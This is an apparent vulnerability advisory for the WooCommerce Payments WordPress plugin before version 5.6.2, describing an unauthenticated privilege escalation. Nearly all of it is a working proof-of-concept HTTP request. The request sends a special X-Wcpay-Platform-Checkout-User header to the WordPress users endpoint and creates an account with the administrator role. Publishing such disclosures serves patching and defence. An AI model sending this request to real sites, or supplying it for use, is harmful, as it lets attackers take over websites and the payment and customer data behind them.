WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation

The plugin has a flaw allowing unauthenticated attackers to create an admin account and take over the blog

PoC

POST /wp-json/wp/v2/users HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Wcpay-Platform-Checkout-User: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/json { “username”: “attacker”, “email”: “[email protected]”, “password”: “attacker-pwd”, “roles”: [“administrator”] }